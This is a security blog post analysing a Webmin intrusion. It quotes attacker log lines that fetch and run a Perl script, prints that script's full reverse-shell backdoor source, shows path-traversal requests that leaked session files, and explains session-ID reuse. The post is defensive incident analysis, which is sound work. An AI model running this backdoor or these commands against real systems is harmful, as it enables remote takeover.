Chris Mosby at myITforum.com

Webmin SessionID Hacking

Tuesday April 1, 2008 at 9:24 am CST
Posted by Xiao Chen


Trackback

I made some interesting observations recently while looking through Webmin logs. It seems that someone was playing with Webmin worm/autorooter tools. Here is a piece of the webmin log:

root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;hostname'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;hostname'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;uname -a;id;uptime'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;unset HISTFILE HISTLOG HISTSAVE SCREEN'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;ls'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;wget aa.bb.cc/d.pl'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;cat /etc/issue'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;perl d.pl 2.2.2.2 2008'

Here we can see some suspicious activity. In particular, the Webmin root user connecting from 1.1.1.1 and trying to download and execute a perl script from aa.bb.cc on the system hosting Webmin. The script contained code to execute a shell + connect back to 2.2.2.2 on port 2008.

#!/usr/bin/perl
use Socket;
print "Data [removed] Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] \n";
exit(1);
}
print " Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print " Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print " Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "" x 4;
exit(0);
}
print " Datached\n\n";

By examining the Webmin log in further detail, it was possible to determine that the attacker used an older Webmin vulnerability (“Webmin Arbitrary File Disclosure Vulnerability (CVE-2006-3392)) to retrieve the webmin.log & sessiondb.pag files.

1.1.1.1 - - [02/Feb/2008:06:31:34 +0800] "GET /unauthenticated/ [lots ..%01/..%01/] /var/webmin/webmin.log HTTP/1.0" 200 390944
1.1.1.1 - - [02/Feb/2008:06:31:42 +0800] "GET /unauthenticated/ [lots ..%01/..%01/] /var/webmin/sessiondb.pag HTTP/1.0" 200 1024

The attacker then tried to access Webmin’s /shell/index.cgi page as follows:

1.1.1.1 - root [02/Feb/2008:06:31:46 +0800] "POST /shell/index.cgi HTTP/1.1" 200 4921

We know that access to /shell/index.cgi requires authentication using a valid Webmin user and corresponding password. However, we see that the attacker was able to access this resource without supplying a password (we see that the HTTP response code is 200). It turns out that this was possible because Webmin stores user session ID values in the webmin.log & sessiondb.pag files. If an attacker can retrieve these files then they can re-use the session ID of a user to access resources as that user without having to supply a password.

For example, here is an entry in webmin.log:

[04/02/2008 15:26:59] root f3fe4b90803a41096af8880e2e948a24 x.x.x.x proc run.cgi "run" "-" "-" cmd='ifconfig -a' input='' mode='0'

“f3fe4b90803a41096af8880e2e948a24? is the session ID in this entry. These session IDs are valid for one week unless a user explicitly logs out of the Webmin interface by clicking the “logout” link. Since most users don’t do this, most session IDs continue to be valid long after they are needed. An attacker using a file disclosure vulnerability such as the one described above can attempt to retrieve + reuse these session IDs to impersonate users. The ability to impersonate users in this manner can lead to complete compromise of affected systems (because /shell/index.cgi can be used to execute arbitrary commands).

If you still run vulnerable webmin you should update it immediately or rename “/shell/index.cgi” script to avoid execute arbitrary commands by attacker. Since this attack vector came to automatic and already actively used in the wild.

Computer Security Research - McAfee Avert Labs Blog.